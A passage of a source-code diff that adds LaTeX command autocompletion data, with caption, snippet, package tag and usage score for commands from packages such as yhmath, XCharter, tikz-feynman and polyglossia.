3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'yhmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'yhmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'yhmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'yhmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'yhmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'yhmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'yhmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'yhmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'yhmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'yhmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'yhmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'yhmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'yhmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'yhmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'yhmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'yhmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'yhmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'yhmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'yhmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'yhmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'yhmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'yhmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'yhmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'yhmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'yhmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'yhmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'yhmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'yhmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'yhmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'yhmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'yhmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'yhmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'yhmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'yhmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'yhmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'yhmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'yhmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'yhmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'yhmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'yhmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'yhmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'yhmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'yhmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'yhmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'yhmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'yhmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'yhmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'yhmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'yhmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'yhmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'yhmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'yhmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'yhmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'yhmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'yhmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'yhmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'yhmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'yhmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'yhmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'yhmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'yhmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'yhmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'yhmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'yhmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'yhmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'yhmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'yhmath-cmd', + score: 0.0063276692758974925, + }, + ], + XCharter: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'XCharter-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'XCharter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'XCharter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'XCharter-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'XCharter-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'XCharter-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'XCharter-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'XCharter-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'XCharter-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'XCharter-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'XCharter-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'XCharter-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'XCharter-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'XCharter-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'XCharter-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'XCharter-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'XCharter-cmd', + score: 0.008565354665444157, + }, + ], + 'tikz-feynman': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-feynman-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-feynman-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-feynman-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-feynman-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-feynman-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-feynman-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-feynman-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-feynman-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-feynman-cmd', + score: 0.2864294797053033, + }, + ], + easylist: [ + { + caption: '\\ListProperties', + snippet: '\\ListProperties', + meta: 'easylist-cmd', + score: 5.7747123038330224e-5, + }, + ], + hologo: [ + { + caption: '\\hologo{}', + snippet: '\\hologo{$1}', + meta: 'hologo-cmd', + score: 0.00028086100750460613, + }, + ], + cases: [ + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'cases-cmd', + score: 0.002995924112493351, + }, + ], + xint: [ + { + caption: '\\xintSgnFork{}', + snippet: '\\xintSgnFork{$1}', + meta: 'xint-cmd', + score: 0.0005720629946669665, + }, + { + caption: '\\xintCmp{}{}', + snippet: '\\xintCmp{$1}{$2}', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + { + caption: '\\xintOdd{}', + snippet: '\\xintOdd{$1}', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + { + caption: '\\xintGeq', + snippet: '\\xintGeq', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + ], + inputenx: [ + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'inputenx-cmd', + score: 0.0002447047447770061, + }, + ], + vwcol: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'vwcol-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'vwcol-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\justifying', + snippet: '\\justifying', + meta: 'vwcol-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\justifying{}', + snippet: '\\justifying{$1}', + meta: 'vwcol-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\RaggedRight', + snippet: '\\RaggedRight', + meta: 'vwcol-cmd', + score: 0.001021021782267457, + }, + { + caption: '\\Centering', + snippet: '\\Centering', + meta: 'vwcol-cmd', + score: 0.00037395241488843035, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'vwcol-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'vwcol-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'vwcol-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'vwcol-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'vwcol-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'vwcol-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'vwcol-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'vwcol-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + ], + multimedia: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'multimedia-cmd', + score: 0.00037306820619479756, + }, + ], + sgame: [ + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'sgame-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'sgame-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'sgame-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'sgame-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'sgame-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'sgame-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'sgame-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'sgame-cmd', + score: 0.2864294797053033, + }, + ], + bussproofs: [ + { + caption: '\\makeatletter', + snippet: '\\makeatletter', + meta: 'bussproofs-cmd', + score: 0.041979363643201636, + }, + { + caption: '\\makeatother', + snippet: '\\makeatother', + meta: 'bussproofs-cmd', + score: 0.03923442255397878, + }, + ], + titlepic: [ + { + caption: '\\titlepic{}', + snippet: '\\titlepic{$1}', + meta: 'titlepic-cmd', + score: 0.00020896323441399082, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'titlepic-cmd', + score: 0.7504160124360846, + }, + ], + paracol: [ + { + caption: '\\switchcolumn', + snippet: '\\switchcolumn', + meta: 'paracol-cmd', + score: 0.0008273060639466222, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'paracol-cmd', + score: 0.008565354665444157, + }, + ], + polyglossia: [ + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'polyglossia-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\normalfont', + snippet: '\\normalfont', + meta: 'polyglossia-cmd', + score: 0.06871177093091137, + }, + { + caption: '\\normalfont{}', + snippet: '\\normalfont{$1}', + meta: 'polyglossia-cmd', + score: 0.06871177093091137, + }, + { + caption: '\\setdefaultlanguage{}', + snippet: '\\setdefaultlanguage{$1}', + meta: 'polyglossia-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'polyglossia-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'polyglossia-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'polyglossia-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'polyglossia-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'polyglossia-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'polyglossia-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'polyglossia-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'polyglossia-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'polyglossia-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'polyglossia-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'polyglossia-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'polyglossia-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'polyglossia-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'polyglossia-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'polyglossia-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'polyglossia-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'polyglossia-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'polyglossia-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'polyglossia-cmd', + score: 0.2864294797053033, + }, + ], + 'zref-user': [ + { + caption: '\\zlabel{}', + snippet: '\\zlabel{$1}', + meta: 'zref-user-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\zref', + snippet: '\\zref', + meta: 'zref-user-cmd', + score: 0.002193637536912482, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-user-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-user-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 